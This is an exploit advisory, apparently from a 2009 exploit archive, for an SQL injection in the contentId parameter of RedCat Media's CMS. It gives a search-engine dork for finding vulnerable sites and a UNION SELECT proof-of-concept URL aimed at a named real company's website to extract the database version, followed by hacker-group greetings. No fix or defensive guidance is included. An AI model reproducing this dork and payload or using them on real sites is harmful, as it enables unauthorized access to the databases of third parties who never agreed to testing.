[x]==========================================[x]
| AntiSecurity[dot]org |
[x]==========================================[x]
[x]==========================================[x]
| Title : redcat media (inurl:index.php?contentId=) SQL Injection Vulnerability
| Vendor : http://www.redcatmedia.co.uk/
| Date : 2 oktober 2009 ( Indonesia )
| Author : s4va
| Contact : sava_sword@yahoo.com
| Blog : http://s4vaworld.uni.cc
[x]==========================================[x]
| Dork : "Powered by RedCat" inurl:index.php?contentId=
[x]==========================================[x]
| Exploit
| http://target/index.php?contentId=[sql]
[x]==========================================[x]
| Proof of concept
|
http://www.5ringstelecom.com/index.php?contentId=-26%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
[x]==========================================[x]
| THX TO:
|blackstar ; x-shadow ; cr4wl3r ; bl4ck_3n91n3 ; k0il ; inc0mp13te ; n0c0py
|thund3r-x2 ; dimm net ; jack- ; c0li ; zxvf ; Oon_Boy ; NoGe ; Kecemplungkalen ; angel
|skay kyu ; t3cm4n ; indounderground ; nyubiz ; n1nj4_blu3 ; qu4ck ; mad0nk
|^cyber_tomat^ ; odod ; atan6 ; th3k1llr3j45q ; em|nem
|mainhack brotherhood ; HipHopHeroes(dot)net ; antisecurity(dot)org N ALL WHO
SUPPORT ME
[x]==========================================[x]